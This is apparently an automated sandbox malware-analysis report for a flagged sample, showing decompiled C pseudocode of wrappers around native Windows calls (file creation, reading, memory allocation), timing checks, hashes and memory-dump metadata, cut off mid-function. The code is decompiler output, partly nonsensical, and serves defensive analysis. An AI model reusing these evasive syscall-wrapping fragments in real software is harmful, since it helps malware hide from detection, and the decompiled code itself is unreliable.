                            			E00A9A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t21;
                            				void* _t31;
                            
                            				_t3 = _a4 + 0xc40; // 0xc40
                            				E00A9AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t21;
                            			}






                            APIs
                            • NtCreateFile.NTDLL(00000060,00A89CE3,?,00A94BA7,00A89CE3,FFFFFFFF,?,?,FFFFFFFF,00A89CE3,00A94BA7,?,00A89CE3,00000060,00000000,00000000), ref: 00A9A39D
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 107bc1d842834a2d8c56a1d27f0857036bd432baf7efd50165dba47c90052602
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: 8FF0BDB2200208AFCB08CF88DC85EEB77EDAF8C754F158248BA1D97241C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 228 a9a3fb-a9a449 call a9af50 NtReadFile
                            C-Code - Quality: 37%
                            			E00A9A3FB(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                            				signed int _v117;
                            				void* _t26;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				void* _t41;
                            
                            				_v117 = _v117 & __eax % __eax;
                            				_t21 = _a4;
                            				_t39 = _a4 + 0xc48;
                            				E00A9AF50(_t37, _a4, _t39,  *((intOrPtr*)(_t21 + 0x10)), 0, 0x2a);
                            				_t26 =  *((intOrPtr*)( *_t39))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t38, _t41); // executed
                            				return _t26;
                            			}










                            APIs
                            • NtReadFile.NTDLL(00A94D62,5EB65239,FFFFFFFF,00A94A21,?,?,00A94D62,?,00A94A21,FFFFFFFF,5EB65239,00A94D62,?,00000000), ref: 00A9A445
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: c2592db80ceeb37e60fda3b8bb2279dc7aab3c7406d4957bce4178abfe595ee2
                            • Instruction ID: 3ab8cb3b9e2a41a3223fca50b4c8863ed710d19b0fb585dcdef6cb963ed3171e
                            • Opcode Fuzzy Hash: c2592db80ceeb37e60fda3b8bb2279dc7aab3c7406d4957bce4178abfe595ee2
                            • Instruction Fuzzy Hash: 11F0E2B6200108AFCB14DF99CC90EEB77A9EF8C354F158248FA1DE7251C630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 231 a9a400-a9a416 232 a9a41c-a9a449 NtReadFile 231->232 233 a9a417 call a9af50 231->233 233->232
                            C-Code - Quality: 37%
                            			E00A9A400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                            				void* _t18;
                            				void* _t27;
                            				intOrPtr* _t28;
                            
                            				_t13 = _a4;
                            				_t28 = _a4 + 0xc48;
                            				E00A9AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                            				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                            				return _t18;
                            			}







                            APIs
                            • NtReadFile.NTDLL(00A94D62,5EB65239,FFFFFFFF,00A94A21,?,?,00A94D62,?,00A94A21,FFFFFFFF,5EB65239,00A94D62,?,00000000), ref: 00A9A445
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: 0b3204c0b477f2001504db8dc3803d81f0a7e14c9cd7efe3d25e3158496971fd
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: D6F0A4B6200208AFCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 250 a9a530-a9a56d call a9af50 NtAllocateVirtualMemory
                            C-Code - Quality: 100%
                            			E00A9A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t14;
                            				void* _t21;
                            
                            				_t3 = _a4 + 0xc60; // 0xca0
                            				E00A9AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t14;
                            			}






                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00A9B124,?,00000000,?,00003000,00000040,00000000,00000000,00A89CE3), ref: 00A9A569
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 87b998390d9c52249b0385484a0b4205d31920e41bc54dedcf520834333e5ff3
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 36F015B6200208AFCB14DF89CC81EAB77ADAF88754F118149BE1C97241C630F810CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 262 a9a47a-a9a496 263 a9a49c-a9a4a9 NtClose 262->263 264 a9a497 call a9af50 262->264 264->263
                            C-Code - Quality: 100%
                            			E00A9A47A(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, void* _a8) {
                            				long _t11;
                            				void* _t17;
                            
                            				 *(__ebx - 0x74aaf397) =  *(__ebx - 0x74aaf397) | __ecx + __eax;
                            				_t8 = _a4;
                            				_t4 = _t8 + 0x10; // 0x300
                            				_t5 = _t8 + 0xc50; // 0xa8a933
                            				E00A9AF50(_t17, _a4, _t5,  *_t4, 0, 0x2c);
                            				_t11 = NtClose(_a8); // executed
                            				return _t11;
                            			}






                            APIs
                            • NtClose.NTDLL(00A94D40,?,?,00A94D40,00A89CE3,FFFFFFFF), ref: 00A9A4A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 1d6e66827e6c4450caf5d3e7831a32d6282e94e63c43afec602aefafe6c27fae
                            • Instruction ID: 76bdeaf7ac2892a199cca6830444660f31500bc55789229b3032d443abcfed9b
                            • Opcode Fuzzy Hash: 1d6e66827e6c4450caf5d3e7831a32d6282e94e63c43afec602aefafe6c27fae
                            • Instruction Fuzzy Hash: 97E0EC766002106BDB14EBA8CC85EE77B58EF45360F1545AAB95D9B242D531E50087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 265 a9a480-a9a4a9 call a9af50 NtClose
                            C-Code - Quality: 100%
                            			E00A9A480(intOrPtr _a4, void* _a8) {
                            				long _t8;
                            				void* _t11;
                            
                            				_t5 = _a4;
                            				_t2 = _t5 + 0x10; // 0x300
                            				_t3 = _t5 + 0xc50; // 0xa8a933
                            				E00A9AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                            				_t8 = NtClose(_a8); // executed
                            				return _t8;
                            			}






                            APIs
                            • NtClose.NTDLL(00A94D40,?,?,00A94D40,00A89CE3,FFFFFFFF), ref: 00A9A4A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: 979b39916a2e0f77df60a4ba1ef322db6e398d28f90283c5926c75c0e05f0176
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: D8D01776200214ABDB10EB98CC85EA77BACEF48760F154499BA1C9B242C530FA0086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 26e81715abbe59193599ad6cff2f54ba1d2afc6df706104eec9a0f86526e2f61
                            • Instruction ID: 58d29fd8f3092561d818073debf2e1fa1412821d8d281e55faece6183825a86f
                            • Opcode Fuzzy Hash: 26e81715abbe59193599ad6cff2f54ba1d2afc6df706104eec9a0f86526e2f61
                            • Instruction Fuzzy Hash: A5900265325004070115A59A4704507404AA7D9391351C031F5405550CDA6188617161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 401295cc5fd6469bb13b21acdb0f1470a25767559dbce6c9641ca89301a2d43b
                            • Instruction ID: 834f4a569e77bd8f5e9c98e47625b2f4276fa34a7c7052b3a6bd37ae2b932134
                            • Opcode Fuzzy Hash: 401295cc5fd6469bb13b21acdb0f1470a25767559dbce6c9641ca89301a2d43b
                            • Instruction Fuzzy Hash: 879002B131500806D150719A84047464009A7D4341F51C021A9454554ECA998DD576A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8309c0f5b3f768f53f517b4933e7316f21418f2ad982992da383cd3687b017b8
                            • Instruction ID: 98a7735f009bda13d4e8ec7d5d8867041b941ead3ba5441a7f953da758b18cba
                            • Opcode Fuzzy Hash: 8309c0f5b3f768f53f517b4933e7316f21418f2ad982992da383cd3687b017b8
                            • Instruction Fuzzy Hash: 9D9002A1316004074115719A8414616800EA7E4241B51C031E5404590DC96588917165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 451da52a33e34ac390ec85179fe787ab5c5f0ea9f87cce6d4cc5bb0c3b7f1a6e
                            • Instruction ID: 6eb8c2e6c3de9fd90129402523b3b32c6968879cbbb55bcb761a1180205462d5
                            • Opcode Fuzzy Hash: 451da52a33e34ac390ec85179fe787ab5c5f0ea9f87cce6d4cc5bb0c3b7f1a6e
                            • Instruction Fuzzy Hash: 509002A135500846D110619A8414B064009E7E5341F51C025E5454554DCA59CC527166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b067af2d964a955e37ccd6a1b2e278ff599549cdbf34da4412fe6ba01bb35c20
                            • Instruction ID: 629727a7ae675f3e0e32fb2fa842a463f7b10fd3d1a8295caa907f878ce8bb69
                            • Opcode Fuzzy Hash: b067af2d964a955e37ccd6a1b2e278ff599549cdbf34da4412fe6ba01bb35c20
                            • Instruction Fuzzy Hash: A490027131500817D121619A8504707400DA7D4281F91C422A4814558DDA968952B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8b43f113bdc97a7634cec38878f50f5ab90d829341141523d54426433127a6c2
                            • Instruction ID: 85ee13ff4fa0b772b0ed031749e8a2a5bb1e5db8e769ac49fc180151e59e6679
                            • Opcode Fuzzy Hash: 8b43f113bdc97a7634cec38878f50f5ab90d829341141523d54426433127a6c2
                            • Instruction Fuzzy Hash: 9C900261356045565555B19A8404507800AB7E4281791C022A5804950CC9669856F661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7e83690e6492ac161b4d35cfe705da9919bdc31bf608f85f02e3b43b022ab26c
                            • Instruction ID: 2180f55a542fb8f78a9a90a256fab85f9ee21e851cd7be5e155dbf99f61cd5dc
                            • Opcode Fuzzy Hash: 7e83690e6492ac161b4d35cfe705da9919bdc31bf608f85f02e3b43b022ab26c
                            • Instruction Fuzzy Hash: 8890026171500906D111719A8404616400EA7D4281F91C032A5414555ECE658992B171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4db4ebf244dfd25739082473b00c5ef01e15502feac5594b22b03b8b530c6270
                            • Instruction ID: bcd0c1f04adb9fc4837872ede0d79e2cd39d4c3092d6ae13b130450180461d12
                            • Opcode Fuzzy Hash: 4db4ebf244dfd25739082473b00c5ef01e15502feac5594b22b03b8b530c6270
                            • Instruction Fuzzy Hash: 1A90027131500806D11065DA94086464009A7E4341F51D021A9414555ECAA588917171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: d19322abcbe5b77f2331f74ec9f9dff9eb6b756f2fda60031a3b536b615c572e
                            • Instruction ID: 5795688dd1a40193616bb796bb87086477f242ecfb4ee96726a23c1bd1b3eb82
                            • Opcode Fuzzy Hash: d19322abcbe5b77f2331f74ec9f9dff9eb6b756f2fda60031a3b536b615c572e
                            • Instruction Fuzzy Hash: DE90026131500407D150719A94186068009F7E5341F51D021E4804554CDD5588567262
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b4df559a4e28a68bc547dc0d72d9943fbb49bf726b2d9ccd2bd3ea22b390f798
                            • Instruction ID: 8f45b5924f0998d4e49ecb917e6f3b8249f6a72804d37bf9d2f8f58a9fb7b0b3
                            • Opcode Fuzzy Hash: b4df559a4e28a68bc547dc0d72d9943fbb49bf726b2d9ccd2bd3ea22b390f798
                            • Instruction Fuzzy Hash: 5190026932700406D190719A940860A4009A7D5242F91D425A4405558CCD5588697361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f7f283916b179743b7f0dda35dc994a7dfd1ca197dcae0c1d119563c4c2b1ab6
                            • Instruction ID: 3f145d0d0c1fe763a2a1ce7f22a0090b583caf92c9a44847da693cb4b779c547
                            • Opcode Fuzzy Hash: f7f283916b179743b7f0dda35dc994a7dfd1ca197dcae0c1d119563c4c2b1ab6
                            • Instruction Fuzzy Hash: FE90027131500C06D190719A840464A4009A7D5341F91C025A4415654DCE558A5977E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4f7dddac4d9aedab77d92273f0198df35ddbc6fd87bc8659b7d6c540f05f396f
                            • Instruction ID: 04f5955adba394b55514fe8ddd8463de76f24851a5d4c39d9300a596a08e622b
                            • Opcode Fuzzy Hash: 4f7dddac4d9aedab77d92273f0198df35ddbc6fd87bc8659b7d6c540f05f396f
                            • Instruction Fuzzy Hash: 1C90026132580446D21065AA8C14B074009A7D4343F51C125A4544554CCD5588617561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: acc39c478c64f9d83cfcc1ab9cfc9490ba6cac331791ad8d3716cbae99c35554
                            • Instruction ID: b86e2c9f6a8bcdb290caf89d8abea61150be7067de0e5864b6be906acb270bde
                            • Opcode Fuzzy Hash: acc39c478c64f9d83cfcc1ab9cfc9490ba6cac331791ad8d3716cbae99c35554
                            • Instruction Fuzzy Hash: AA90026171500446415071AAC8449068009BBE5251751C131A4D88550DC999886576A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 195377a14f8c971c86655ba78b4383b81eb7ffeee7db56424b0b7f4f6932133d
                            • Instruction ID: 941bc59eb1005b40cccac7f055d687af7475f1c38ac05765b51282c9f96e8c6e
                            • Opcode Fuzzy Hash: 195377a14f8c971c86655ba78b4383b81eb7ffeee7db56424b0b7f4f6932133d
                            • Instruction Fuzzy Hash: 2790027131540806D110619A881470B4009A7D4342F51C021A5554555DCA65885175B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6d66e3652616a153122a3b9cfdb57e277bf5f7301a129877d1250775f16ab285
                            • Instruction ID: 552be38f6fc321dc2103207fe04c882348442f048a221fe0994a0cde47a66b1b
                            • Opcode Fuzzy Hash: 6d66e3652616a153122a3b9cfdb57e277bf5f7301a129877d1250775f16ab285
                            • Instruction Fuzzy Hash: D090027131508C06D120619AC40474A4009A7D4341F55C421A8814658DCAD588917161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00A89AA0(intOrPtr _a4) {
                            				intOrPtr _v8;
                            				char _v24;
                            				char _v284;
                            				char _v804;
                            				char _v840;
                            				void* _t24;
                            				void* _t31;
                            				void* _t33;
                            				void* _t34;
                            				void* _t39;
                            				void* _t50;
                            				intOrPtr _t52;
                            				void* _t53;
                            				void* _t54;
                            				void* _t55;
                            				void* _t56;
                            
                            				_t52 = _a4;
                            				_t39 = 0; // executed
                            				_t24 = E00A87EA0(_t52,  &_v24); // executed
                            				_t54 = _t53 + 8;
                            				if(_t24 != 0) {
                            					E00A880B0( &_v24,  &_v840);
                            					_t55 = _t54 + 8;
                            					do {
                            						E00A9BE00( &_v284, 0x104);
                            						E00A9C470( &_v284,  &_v804);
                            						_t56 = _t55 + 0x10;
                            						_t50 = 0x4f;
                            						while(1) {
                            							_t31 = E00A94DE0(E00A94D80(_t52, _t50),  &_v284);
                            							_t56 = _t56 + 0x10;
                            							if(_t31 != 0) {
                            								break;
                            							}
                            							_t50 = _t50 + 1;
                            							if(_t50 <= 0x62) {
                            								continue;
                            							} else {
                            							}
                            							goto L8;
                            						}
                            						_t9 = _t52 + 0x14; // 0xffffe055
                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                            						_t39 = 1;
                            						L8:
                            						_t33 = E00A880E0( &_v24,  &_v840);
                            						_t55 = _t56 + 8;
                            					} while (_t33 != 0 && _t39 == 0);
                            					_t34 = E00A88160(_t52,  &_v24); // executed
                            					if(_t39 == 0) {
                            						asm("rdtsc");
                            						asm("rdtsc");
                            						_v8 = _t34 - 0 + _t34;
                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                            					}
                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                            					_t20 = _t52 + 0x31; // 0x5608758b
                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                            					return 1;
                            				} else {
                            					return _t24;
                            				}
                            			}




















                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                            • Instruction ID: 3e4adf76723213499b829044b322dc9ce8b07056189f62b839fd2afc257ee546
                            • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                            • Instruction Fuzzy Hash: 00210772D442185BCB25E764AE52AFFB3BCAB54344F48016DF94993141FA34AE0987B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 195 a88310-a8835a call a9be50 call a9c9f0 call a8ace0 call a94e40 204 a8835c-a8836e PostThreadMessageW 195->204 205 a8838e-a88392 195->205 206 a8838d 204->206 207 a88370-a8838a call a8a470 204->207 206->205 207->206
                            C-Code - Quality: 82%
                            			E00A88310(void* __eflags, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t12;
                            				intOrPtr* _t13;
                            				int _t14;
                            				long _t21;
                            				intOrPtr* _t25;
                            				void* _t26;
                            				void* _t30;
                            
                            				_t30 = __eflags;
                            				_v68 = 0;
                            				E00A9BE50( &_v67, 0, 0x3f);
                            				E00A9C9F0( &_v68, 3);
                            				_t12 = E00A8ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                            				_t13 = E00A94E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                            				_t25 = _t13;
                            				if(_t25 != 0) {
                            					_t21 = _a8;
                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                            					_t32 = _t14;
                            					if(_t14 == 0) {
